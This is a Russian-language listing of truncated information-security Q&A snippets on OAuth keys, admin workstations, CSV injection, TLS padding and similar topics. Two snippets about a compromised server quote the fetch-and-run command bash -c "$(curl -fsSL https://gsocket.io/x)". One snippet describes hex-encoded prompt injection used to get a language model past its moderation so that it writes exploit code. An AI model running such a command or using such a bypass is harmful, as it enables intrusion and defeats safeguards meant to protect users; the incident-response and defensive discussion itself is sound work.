Вопросы и Ответы по Информационной Безопасности

Вопрос или проблема Я работаю с клиентом, который для использования своего веб-API OAuth 2.0 требует, чтобы я предоставил им JSON Web Key (JWK), содержащий встроенный сертификат X.509. Затем, когда я запрашиваю информацию из API, они говорят, что мне нужно передать “

Вопрос или проблема Я хотел бы использовать выделенную машину для выполнения административных задач в сети моей компании, которые заключаются в следующем: Использование RSAT для администрирования домена Active Directory Использование SSH для подключения

Вопрос или проблема Сервер моего клиента был скомпрометирован. Они запускают этот скрипт с помощью PHP-скрипта bash -c "$(curl -fsSL https://gsocket.io/x)" и у меня есть несколько папок в /tmp, как ниже -rw------- 1 *** *** 153310 30 Сен 12:07 phpb0wrlJ

Вопрос или проблема Я получал звонки от “друга” – иногда с его номера в Великобритании, в другие разы с закрытого номера. Когда я смотрю на свой счет, эти закрытые номера отображаются как исходящие из моего района.

Вопрос или проблема Недавние отчеты описывают, как новая техника инъекции подсказок использует шестнадцатеричное кодирование для обхода внутренних мер модерации контента в языковых моделях, таких как ChatGPT-4, что позволяет им генерировать код для эксплуатации.

Вопрос или проблема Сервер моего клиента был скомпрометирован. Они запускают этот скрипт bash -c "$(curl -fsSL https://gsocket.io/x)" и у меня есть несколько папок в /tmp, как указано ниже -rw------- 1 *** *** 153310 30 Сен 12:07 phpb0wrlJ -rw-------

Вопрос или проблема Etckeeper отличен, но из документации неясно, как безопасно проверить коммит или ветку напрямую в /etc. Проблема в том, что при выполнении checkout git не учитывает метаданные и разрешения, и вам придется восстанавливать их с помощью

Вопрос или проблема Политика компании гласит, что все компоненты, обращенные в интернет, должны быть защищены с помощью WAF. Однако у меня есть Azure Blobstorage, который хранит публичные веб-ресурсы. Я не думаю, что имеет смысл ставить его за WAF.

Вопрос или проблема Например, список людей, которым запрещен полет в США, обычно называют театром безопасности, так как его легко обойти. Однако размытие номерных знаков при публициции фотографий в интернете не считается театром безопасности, хотя номерные

Вопрос или проблема Этот вопрос был мигрирован с Stack Exchange по информационной безопасности, потому что на него можно ответить в Stack Exchange по сетевой инженерии. Мигрирован 3 минуты назад. Я недавно начал заниматься сетями.

Вопрос или проблема Я вел дебаты с другом о модели безопасности в новых версиях OS X. OS X El Capitan и более новые версии имеют функцию безопасности System Integrity Protection, которая защищает аспекты операционной системы даже от пользователей с правами root.

Вопрос или проблема Чтобы позволить пользователям API проверять подлинность исходящих вебхуков, я использую модель, аналогичную Slack: Конкатенировать временную метку и тело, HMAC с предустановленным ключом, добавить временную метку и HMAC дайджест в заголовки.

Вопрос или проблема Какие техники современные трояны используют для поддержания стойкости на скомпрометированных системах и эффективного уклонения от обнаружения современными средствами безопасности? Какие конкретные методологии применяются для таких

Вопрос или проблема Уже неделю антивирус Microsoft Windows 10 22H2, Antimalware Service Executable, продолжает сообщать мне, что PDFs, которые я создаю с помощью инструмента “Сохранить как PDF” в Google Chrome (версия 130.

Вопрос или проблема В недавнем ssh -vv выводе я увидел, что OpenSSH упоминает файл закрытого ключа id_xmss. XMSS определен в RFC 8391, “XMSS: eXtended Merkle Signature Scheme”, май 2018. OpenSSH имеет экспериментальную поддержку XMSS с версии 7.

Вопрос или проблема У меня есть сенсорные устройства с веб-интерфейсом конфигурации. Каждое устройство имеет уникальный серийный номер. Устройства развёрнуты в различных средах с частными IP-адресами, такими как 192.168.x.y или 10.

Вопрос или проблема У меня есть компьютер с Windows 10 и 3 жесткими дисками: Samsung SSD 850 EVO 1TB (SSD, системный диск, на котором установлена Windows 10, пока не зашифрован) Первый 3 ТБ HDD уже защищен BitLocker Второй 3 ТБ HDD уже защищен BitLocker

Вопрос или проблема Я создаю приложение, которое извлекает информацию из другой системы и пишет отчеты в формате CSV. Я пытаюсь уменьшить уязвимости CSV-впрыска в нем. Я провел некоторые исследования и начал с OWASP – CSV Injection, где предлагается

Вопрос или проблема Раздел 5.4 спецификации TLS 1.3 описывает заполнение записей. Один из способов снижения риска BREACH — это добавление случайного заполнения. Поэтому мне интересно: Требует ли TLS 1.3 случайное заполнение записей?

Вопрос или проблема Безопасен ли ввод данных на стороне клиента при заполнении форм в браузере от JS и других векторов атак? Нет. Web skimming, например, это хорошо известная атака, которая нацелена на данные формы и отправляет их на сервер, контролируемый злоумышленником.